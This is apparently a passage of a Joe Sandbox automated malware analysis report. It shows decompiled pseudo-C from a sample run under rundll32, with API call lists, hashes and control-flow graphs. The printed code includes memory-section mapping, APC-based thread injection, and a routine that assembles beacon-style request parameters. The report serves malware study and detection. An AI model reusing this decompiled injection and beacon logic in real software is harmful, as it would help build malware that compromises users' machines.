                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				int _v28;
                                          				int _v32;
                                          				intOrPtr _v36;
                                          				int _v40;
                                          				int _v44;
                                          				void* _v48;
                                          				void* __esi;
                                          				long _t34;
                                          				void* _t39;
                                          				void* _t47;
                                          				intOrPtr* _t48;
                                          
                                          				_t48 = __eax;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_v48 = 0x18;
                                          				_v44 = 0;
                                          				_v36 = 0x40;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v28 = 0;
                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                          				if(_t34 < 0) {
                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                          				} else {
                                          					 *_t48 = _v16;
                                          					_t39 = E005110BA(_t48,  &_v12); // executed
                                          					_t47 = _t39;
                                          					if(_t47 != 0) {
                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                          					} else {
                                          						memset(_v12, 0, _v24);
                                          						 *_a4 = _v12;
                                          					}
                                          				}
                                          				return _t47;
                                          			}

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00511A91
                                            • Part of subcall function 005110BA: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 005110E7
                                          • memset.NTDLL ref: 00511AB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID: @
                                          • API String ID: 2533685722-2766056989
                                          • Opcode ID: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                          • Instruction ID: 4c29ea65105ca8ee611ee51dc0dff6a5506e08c5492d0903e0f10630dffe5b08
                                          • Opcode Fuzzy Hash: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                          • Instruction Fuzzy Hash: B221F9B5D00609AFDB11DFA9C8849DEFFB9FF48354F104869E615F3210D7319A448BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E005110BA(void** __esi, PVOID* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				long _t13;
                                          
                                          				_v16 = 0;
                                          				asm("stosd");
                                          				_v8 = 0;
                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                          				if(_t13 < 0) {
                                          					_push(_t13);
                                          					return __esi[6]();
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 005110E7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction ID: 402602140221e905d75c1dc1ca5347f99c8743e80e61bee59904685da2187a1f
                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction Fuzzy Hash: 5DF012B590060DBFEB119FA5CC89C9FBBBDEB48394B104979B252E1090D6309E489A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E04081754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t68;
                                          				intOrPtr _t69;
                                          				int _t72;
                                          				void* _t73;
                                          				void* _t74;
                                          				void* _t76;
                                          				void* _t79;
                                          				intOrPtr _t83;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				signed int _t115;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				CHAR* _t136;
                                          				intOrPtr _t137;
                                          				void* _t138;
                                          				void* _t147;
                                          				int _t148;
                                          				void* _t149;
                                          				intOrPtr _t150;
                                          				void* _t152;
                                          				long _t156;
                                          				intOrPtr* _t157;
                                          				intOrPtr* _t158;
                                          				intOrPtr* _t161;
                                          				void* _t162;
                                          				void* _t164;
                                          
                                          				_t147 = __edx;
                                          				_t138 = __ecx;
                                          				_t60 = __eax;
                                          				_v12 = 8;
                                          				if(__eax == 0) {
                                          					_t60 = GetTickCount();
                                          				}
                                          				_t61 =  *0x408d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t62 =  *0x408d014; // 0x3a87c8cd
                                          				_t136 = _a16;
                                          				asm("bswap eax");
                                          				_t63 =  *0x408d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t64 =  *0x408d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t65 =  *0x408d2a4; // 0xbfa5a8
                                          				_t3 = _t65 + 0x408e633; // 0x74666f73
                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x408d02c,  *0x408d004, _t60);
                                          				_t68 = E040857AB();
                                          				_t69 =  *0x408d2a4; // 0xbfa5a8
                                          				_t4 = _t69 + 0x408e673; // 0x74707526
                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                          				_t164 = _t162 + 0x38;
                                          				_t149 = _t148 + _t72; // executed
                                          				_t73 = E040873E9(_t138); // executed
                                          				_t137 = __imp__;
                                          				_v8 = _t73;
                                          				if(_t73 != 0) {
                                          					_t130 =  *0x408d2a4; // 0xbfa5a8
                                          					_t7 = _t130 + 0x408e8cb; // 0x736e6426
                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                          					_t164 = _t164 + 0xc;
                                          					_t149 = _t149 + _t134;
                                          					HeapFree( *0x408d238, 0, _v8);
                                          				}
                                          				_t74 = E0408614A();
                                          				_v8 = _t74;
                                          				if(_t74 != 0) {
                                          					_t125 =  *0x408d2a4; // 0xbfa5a8
                                          					_t11 = _t125 + 0x408e8d3; // 0x6f687726
                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                          					_t164 = _t164 + 0xc;
                                          					HeapFree( *0x408d238, 0, _v8);
                                          				}
                                          				_t150 =  *0x408d324; // 0x4c895b0
                                          				_t76 = E0408757B(0x408d00a, _t150 + 4);
                                          				_t156 = 0;
                                          				_v20 = _t76;
                                          				if(_t76 == 0) {
                                          					L26:
                                          					RtlFreeHeap( *0x408d238, _t156, _a16); // executed
                                          					return _v12;
                                          				} else {
                                          					_t79 = RtlAllocateHeap( *0x408d238, 0, 0x800);
                                          					_v8 = _t79;
                                          					if(_t79 == 0) {
                                          						L25:
                                          						HeapFree( *0x408d238, _t156, _v20);
                                          						goto L26;
                                          					}
                                          					E0408749F(GetTickCount());
                                          					_t83 =  *0x408d324; // 0x4c895b0
                                          					__imp__(_t83 + 0x40);
                                          					asm("lock xadd [eax], ecx");
                                          					_t87 =  *0x408d324; // 0x4c895b0
                                          					__imp__(_t87 + 0x40);
                                          					_t89 =  *0x408d324; // 0x4c895b0
                                          					_t152 = E04084D2C(1, _t147, _a16,  *_t89);
                                          					_v28 = _t152;
                                          					asm("lock xadd [eax], ecx");
                                          					if(_t152 == 0) {
                                          						L24:
                                          						HeapFree( *0x408d238, _t156, _v8);
                                          						goto L25;
                                          					}
                                          					StrTrimA(_t152, 0x408c294);
                                          					_t95 =  *0x408d2a4; // 0xbfa5a8
                                          					_push(_t152);
                                          					_t18 = _t95 + 0x408e252; // 0x616d692f
                                          					_t97 = E04089DEF(_t18);
                                          					_v16 = _t97;
                                          					if(_t97 == 0) {
                                          						L23:
                                          						HeapFree( *0x408d238, _t156, _t152);
                                          						goto L24;
                                          					}
                                          					_t157 = __imp__;
                                          					 *_t157(_t152, _a4);
                                          					 *_t157(_v8, _v20);
                                          					_t158 = __imp__;
                                          					 *_t158(_v8, _v16);
                                          					 *_t158(_v8, _t152);
                                          					_t104 = E0408A5E9(0, _v8);
                                          					_a4 = _t104;
                                          					if(_t104 == 0) {
                                          						_v12 = 8;
                                          						L21:
                                          						E04086106();
                                          						L22:
                                          						HeapFree( *0x408d238, 0, _v16);
                                          						_t156 = 0;
                                          						goto L23;
                                          					}
                                          					_t108 = E04082F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                          					_v12 = _t108;
                                          					if(_t108 == 0) {
                                          						_t161 = _v24;
                                          						_t115 = E0408A060(_t161, _a4, _a8, _a12); // executed
                                          						_v12 = _t115;
                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                          						_t122 =  *_t161;
                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                          						E0408147E(_t161);
                                          					}
                                          					if(_v12 != 0x10d2) {
                                          						L16:
                                          						if(_v12 == 0) {
                                          							_t110 = _a8;
                                          							if(_t110 != 0) {
                                          								_t153 =  *_t110;
                                          								_t159 =  *_a12;
                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                          								_t113 = E04081600(_t153, _t153, _t159 >> 1);
                                          								_t152 = _v28;
                                          								 *_a12 = _t113;
                                          							}
                                          						}
                                          						goto L19;
                                          					} else {
                                          						if(_a8 != 0) {
                                          							L19:
                                          							E0408147E(_a4);
                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                          								goto L22;
                                          							} else {
                                          								goto L21;
                                          							}
                                          						}
                                          						_v12 = _v12 & 0x00000000;
                                          						goto L16;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04081768
                                          • wsprintfA.USER32 ref: 040817B8
                                          • wsprintfA.USER32 ref: 040817D5
                                          • wsprintfA.USER32 ref: 04081801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04081813
                                          • wsprintfA.USER32 ref: 04081834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04081844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04081872
                                          • GetTickCount.KERNEL32 ref: 04081883
                                          • RtlEnterCriticalSection.NTDLL(04C89570), ref: 04081897
                                          • RtlLeaveCriticalSection.NTDLL(04C89570), ref: 040818B5
                                            • Part of subcall function 04084D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,040852FE,?,04C895B0), ref: 04084D57
                                            • Part of subcall function 04084D2C: lstrlen.KERNEL32(?,?,?,040852FE,?,04C895B0), ref: 04084D5F
                                            • Part of subcall function 04084D2C: strcpy.NTDLL ref: 04084D76
                                            • Part of subcall function 04084D2C: lstrcat.KERNEL32(00000000,?), ref: 04084D81
                                            • Part of subcall function 04084D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,040852FE,?,04C895B0), ref: 04084D9E
                                          • StrTrimA.SHLWAPI(00000000,0408C294,?,04C895B0), ref: 040818EC
                                            • Part of subcall function 04089DEF: lstrlen.KERNEL32(?,00000000,00000000,04085335,616D692F,00000000), ref: 04089DFB
                                            • Part of subcall function 04089DEF: lstrlen.KERNEL32(?), ref: 04089E03
                                            • Part of subcall function 04089DEF: lstrcpy.KERNEL32(00000000,?), ref: 04089E1A
                                            • Part of subcall function 04089DEF: lstrcat.KERNEL32(00000000,?), ref: 04089E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04081919
                                          • lstrcpy.KERNEL32(?,?), ref: 04081921
                                          • lstrcat.KERNEL32(?,?), ref: 0408192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04081935
                                            • Part of subcall function 0408A5E9: lstrlen.KERNEL32(?,00000000,0408D330,00000001,0408937A,0408D00C,0408D00C,00000000,00000005,00000000,00000000,?,?,?,0408207E,?), ref: 0408A5F2
                                            • Part of subcall function 0408A5E9: mbstowcs.NTDLL ref: 0408A619
                                            • Part of subcall function 0408A5E9: memset.NTDLL ref: 0408A62B
                                          • wcstombs.NTDLL ref: 040819C8
                                            • Part of subcall function 0408A060: SysAllocString.OLEAUT32(?), ref: 0408A09B
                                            • Part of subcall function 0408A060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0408A11E
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04081A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04081A15
                                          • HeapFree.KERNEL32(00000000,?,?,04C895B0), ref: 04081A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04081A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04081A39
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: 44d89094b457cf32eb9d1e0ae8be98803e5b503c5ee778c5d593f7aba3b02fe6
                                          • Instruction ID: 618499d5f60ee8509e8bc5a845f03d44f74ba45fe176d532f44b9d0d89424e29
                                          • Opcode Fuzzy Hash: 44d89094b457cf32eb9d1e0ae8be98803e5b503c5ee778c5d593f7aba3b02fe6
                                          • Instruction Fuzzy Hash: BF912971900109EFEB11EFA4DE48A9A7BB9EF08354F144168F488FB260D739ED51DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 97 5111d4-5111e7 call 51179c 100 511306-511308 97->100 101 5111ed 97->101 102 5111ee-511216 SwitchToThread call 511b6f Sleep 101->102 105 511218-51121a 102->105 106 511220-511224 105->106 107 511305 105->107 108 511226-511231 call 51130b 106->108 109 51127a-51129a CreateThread 106->109 107->100 118 511233-511244 GetLongPathNameW 108->118 119 511274 108->119 111 5112f5-5112f7 GetLastError 109->111 112 51129c-5112b4 QueueUserAPC 109->112 114 5112fa-511301 111->114 115 5112d1-5112d3 112->115 116 5112b6-5112cb GetLastError TerminateThread CloseHandle SetLastError 112->116 114->107 120 511303 GetLastError 114->120 115->111 117 5112d5-5112e3 WaitForSingleObject 115->117 116->115 121 5112f0-5112f3 CloseHandle 117->121 122 5112e5-5112ea GetExitCodeThread 117->122 123 511246-511257 call 511026 118->123 124 51126a-511272 118->124 119->109 120->107 121->114 122->121 123->124 127 511259-511263 GetLongPathNameW call 511938 123->127 124->109 129 511268 127->129 129->109
                                          C-Code - Quality: 85%
                                          			E005111D4(void* __ecx, void* __edx, void* __edi, long _a4) {
                                          				long _v8;
                                          				void* _v32;
                                          				long _t21;
                                          				long _t23;
                                          				long _t25;
                                          				void* _t26;
                                          				long _t29;
                                          				long _t30;
                                          				long _t34;
                                          				void* _t39;
                                          				intOrPtr _t42;
                                          				void* _t47;
                                          				void* _t52;
                                          				signed int _t55;
                                          				void* _t57;
                                          				intOrPtr* _t58;
                                          
                                          				_t47 = __ecx;
                                          				_t21 = E0051179C();
                                          				_v8 = _t21;
                                          				if(_t21 != 0) {
                                          					return _t21;
                                          				}
                                          				do {
                                          					_t55 = SwitchToThread() + 8;
                                          					_t23 = E00511B6F(__edi, _t55); // executed
                                          					_v8 = _t23;
                                          					Sleep(0x20 + _t55 * 4); // executed
                                          					_t25 = _v8;
                                          				} while (_t25 == 0xc);
                                          				if(_t25 != 0) {
                                          					L21:
                                          					return _t25;
                                          				}
                                          				_push(__edi);
                                          				if(_a4 != 0) {
                                          					L11:
                                          					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x514140, 0, 0); // executed
                                          					_t57 = _t26;
                                          					if(_t57 == 0) {
                                          						L18:
                                          						_v8 = GetLastError();
                                          						L19:
                                          						_t25 = _v8;
                                          						if(_t25 == 0xffffffff) {
                                          							_t25 = GetLastError();
                                          						}
                                          						goto L21;
                                          					}
                                          					_t29 = QueueUserAPC(E005116E4, _t57,  &_v32); // executed
                                          					if(_t29 == 0) {
                                          						_t34 = GetLastError();
                                          						_a4 = _t34;
                                          						TerminateThread(_t57, _t34);
                                          						CloseHandle(_t57);
                                          						_t57 = 0;
                                          						SetLastError(_a4);
                                          					}
                                          					if(_t57 == 0) {
                                          						goto L18;
                                          					} else {
                                          						_t30 = WaitForSingleObject(_t57, 0xffffffff);
                                          						_v8 = _t30;
                                          						if(_t30 == 0) {
                                          							GetExitCodeThread(_t57,  &_v8);
                                          						}
                                          						CloseHandle(_t57);
                                          						goto L19;
                                          					}
                                          				}
                                          				if(E0051130B(_t47,  &_a4) != 0) {
                                          					 *0x514138 = 0;
                                          					goto L11;
                                          				}
                                          				_t58 = __imp__GetLongPathNameW;
                                          				_t39 =  *_t58(_a4, 0, 0); // executed
                                          				_t52 = _t39;
                                          				if(_t52 == 0) {
                                          					L9:
                                          					 *0x514138 = _a4;
                                          					goto L11;
                                          				}
                                          				_t10 = _t52 + 2; // 0x2
                                          				_t42 = E00511026(_t52 + _t10);
                                          				 *0x514138 = _t42;
                                          				if(_t42 == 0) {
                                          					goto L9;
                                          				}
                                          				 *_t58(_a4, _t42, _t52); // executed
                                          				E00511938(_a4);
                                          				goto L11;
                                          			}

                                          APIs
                                            • Part of subcall function 0051179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005111E0), ref: 005117AB
                                            • Part of subcall function 0051179C: GetVersion.KERNEL32(?,005111E0), ref: 005117BA
                                            • Part of subcall function 0051179C: GetCurrentProcessId.KERNEL32(?,005111E0), ref: 005117D6
                                            • Part of subcall function 0051179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005111E0), ref: 005117EF
                                          • SwitchToThread.KERNEL32 ref: 005111EE
                                            • Part of subcall function 00511B6F: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00511BC5
                                            • Part of subcall function 00511B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,005111FF,-00000008), ref: 00511C57
                                            • Part of subcall function 00511B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00511C72
                                          • Sleep.KERNELBASE(00000000,-00000008), ref: 0051120A
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0051123E
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0051125E
                                          • CreateThread.KERNEL32 ref: 0051128A
                                          • QueueUserAPC.KERNELBASE(005116E4,00000000,?), ref: 005112A6
                                          • GetLastError.KERNEL32 ref: 005112B6
                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 005112BD
                                          • CloseHandle.KERNEL32(00000000), ref: 005112C4
                                          • SetLastError.KERNEL32(?), ref: 005112CB
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005112D8
                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 005112EA
                                          • CloseHandle.KERNEL32(00000000), ref: 005112F1
                                          • GetLastError.KERNEL32 ref: 005112F5
                                          • GetLastError.KERNEL32 ref: 00511303
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                          • String ID:
                                          • API String ID: 3896949738-0
                                          • Opcode ID: a6ffb12e47ae28684f50c5107542732241bc3a072f6ed96a1f35ac60bd964b1c
                                          • Instruction ID: 937effe6d7642bacd05ccd0f8d9edd3e6afbfc646c5531a99c3656e46018383b
                                          • Opcode Fuzzy Hash: a6ffb12e47ae28684f50c5107542732241bc3a072f6ed96a1f35ac60bd964b1c
                                          • Instruction Fuzzy Hash: 19318175800519BFEB10AFB5DC888EE7EE8FB283907108565FA11D3110D7348E85EBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 130 4089b6f-4089ba1 memset CreateWaitableTimerA 131 4089d23-4089d29 GetLastError 130->131 132 4089ba7-4089c00 _allmul SetWaitableTimer WaitForMultipleObjects 130->132 133 4089d2d-4089d37 131->133 134 4089c8b-4089c91 132->134 135 4089c06-4089c09 132->135 136 4089c92-4089c96 134->136 137 4089c0b call 40868cf 135->137 138 4089c14 135->138 139 4089c98-4089ca0 HeapFree 136->139 140 4089ca6-4089caa 136->140 143 4089c10-4089c12 137->143 142 4089c1e 138->142 139->140 140->136 144 4089cac-4089cb6 CloseHandle 140->144 145 4089c22-4089c27 142->145 143->138 143->142 144->133 146 4089c29-4089c30 145->146 147 4089c3a-4089c68 call 4089f11 145->147 146->147 148 4089c32 146->148 151 4089cb8-4089cbd 147->151 152 4089c6a-4089c75 147->152 148->147 153 4089cdc-4089ce4 151->153 154 4089cbf-4089cc5 151->154 152->145 155 4089c77-4089c87 call 40854ac 152->155 158 4089cea-4089d18 _allmul SetWaitableTimer WaitForMultipleObjects 153->158 154->134 157 4089cc7-4089cda call 4086106 154->157 155->134 157->158 158->145 161 4089d1e 158->161 161->134
                                          C-Code - Quality: 83%
                                          			E04089B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				intOrPtr _v120;
                                          				struct %anon52 _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t60;
                                          				long _t64;
                                          				struct %anon52 _t65;
                                          				void* _t68;
                                          				void* _t72;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t75 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0x408d240);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L0408B088();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t75;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0x408d26c; // 0x3bc
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0x408d24c = 5;
                                          						} else {
                                          							_t68 = E040868CF(); // executed
                                          							if(_t68 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0x408d260 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t73 = _v104.LowPart;
                                          						_t58 = _t73 << 4;
                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                          						_t74 = _t73 + 1;
                                          						_v92.LowPart = _t73 + 1;
                                          						_t60 = E04089F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                          						_v128.LowPart = _t60;
                                          						if(_t60 != 0) {
                                          							goto L17;
                                          						}
                                          						_t65 = _v92;
                                          						_v104.LowPart = _t65;
                                          						_t97 = _t65 - 3;
                                          						if(_t65 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_v120 = E040854AC(_t74, _t97,  &_v72, _a4, _a8);
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t60 - 0x10d2;
                                          						if(_t60 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0x408d244);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0x408d248; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t60 = E04086106();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0x408d248);
                                          								L21:
                                          								L0408B088();
                                          								_v104.LowPart = _t60;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t64;
                                          								__eflags = _t64;
                                          								if(_t64 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t72 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							HeapFree( *0x408d238, 0, _t54);
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t72 = _t72 - 1;
                                          					} while (_t72 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}

                                          APIs
                                          • memset.NTDLL ref: 04089B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04089B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04089BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04089BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04084AC4,?), ref: 04089BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04084AC4,?,00000000), ref: 04089CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04084AC4,?,00000000,?,?), ref: 04089CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04089CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04089D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04089D10
                                            • Part of subcall function 040868CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04C89388,00000000,?,7519F710,00000000,7519F730), ref: 0408691E
                                            • Part of subcall function 040868CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04C893C0,?,00000000,30314549,00000014,004F0053,04C8937C), ref: 040869BB
                                            • Part of subcall function 040868CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04089C10), ref: 040869CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04084AC4,?,00000000,?,?), ref: 04089D23
                                          Memory Dump Source
